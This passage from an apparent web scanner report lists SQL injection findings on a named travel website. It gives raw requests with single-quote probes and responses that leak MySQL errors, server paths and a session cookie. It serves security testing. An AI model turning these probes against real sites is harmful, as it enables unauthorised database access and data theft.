Date: Fri, 18 Mar 2011 16:49:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10070

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'9026' at line 1<br /><br /><textarea rows="10" cols="10
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...
1.73. http://www.caribbean-ocean.com/countries2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /countries2.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /countries2.php?id=308' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/accommodation2.php?id=9026
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:45:59 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6888

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.74. http://www.caribbean-ocean.com/countries2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /countries2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /countries2.php?id/1'=308 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/accommodation2.php?id=9026
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:47:43 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6881

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.75. http://www.caribbean-ocean.com/enquiry.php [accomm_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /enquiry.php

Issue detail

The accomm_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the accomm_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /enquiry.php?accomm_id=9026' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:27 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 19026

<html>
<head>

<link href="styles.css" type="text/css" rel="stylesheet" />
<script src="tabs.js" type="text/javascript"></script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text
...[SNIP]...
<div style="height:auto; padding:15px;">
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/enquiry.php on line 299
<!-- HERE! -->
...[SNIP]...
1.76. http://www.caribbean-ocean.com/enquiry.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /enquiry.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /enquiry.php?accomm_id=/1'9026 HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:43 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 19036

<html>
<head>

<link href="styles.css" type="text/css" rel="stylesheet" />
<script src="tabs.js" type="text/javascript"></script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text
...[SNIP]...
<div style="height:auto; padding:15px;">
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'9026' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/enquiry.php on line 299
<!-- HERE! -->
...[SNIP]...
1.77. http://www.caribbean-ocean.com/gallery.php [accomm_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /gallery.php

Issue detail

The accomm_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the accomm_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /gallery.php?accomm_id=9026' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:26 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7059
Connection: close
Content-Type: text/html

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/gallery.php on line 34
<html>
...[SNIP]...
1.78. http://www.caribbean-ocean.com/gallery.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /gallery.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /gallery.php?accomm_id=/1'9026 HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7069
Connection: close
Content-Type: text/html

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'9026' at line 1<br /><br /><textarea rows="10" cols="10
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/gallery.php on line 34
<html>
...[SNIP]...
1.79. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /get-image.php?id=18696' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:45:29 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...
1.80. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /get-image.php?id=1/1'8696 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:46:52 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'8696' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...
1.81. http://www.caribbean-ocean.com/luxury%20Anguilla%20Resort%20holidays/112 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Anguilla%20Resort%20holidays/112

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Anguilla%20Resort%20holidays/112' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:54:53 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.82. http://www.caribbean-ocean.com/luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.83. http://www.caribbean-ocean.com/luxury%20Aruba%20Resort%20holidays/307 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Aruba%20Resort%20holidays/307

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Aruba%20Resort%20holidays/307' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:21 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.84. http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Bahamas%20Resort%20holidays/116

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Bahamas%20Resort%20holidays/116' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:48:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6888

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.85. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Barbados%20Resort%20holidays/91' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:37 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6887
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.86. http://www.caribbean-ocean.com/luxury%20Bermuda%20Resort%20holidays/119 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Bermuda%20Resort%20holidays/119

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Bermuda%20Resort%20holidays/119' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:54:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.87. http://www.caribbean-ocean.com/luxury%20Bonaire%20Island%20holidays/308 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Bonaire%20Island%20holidays/308

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Bonaire%20Island%20holidays/308' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:42 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.88. http://www.caribbean-ocean.com/luxury%20British%20Virgin%20Islands%20holidays/108 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20British%20Virgin%20Islands%20holidays/108

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20British%20Virgin%20Islands%20holidays/108' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:53 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.89. http://www.caribbean-ocean.com/luxury%20Cayman%20Islands%20holidays/115 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Cayman%20Islands%20holidays/115

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Cayman%20Islands%20holidays/115' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.90. http://www.caribbean-ocean.com/luxury%20Cuba%20Resort%20holidays/118 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Cuba%20Resort%20holidays/118

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Cuba%20Resort%20holidays/118' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
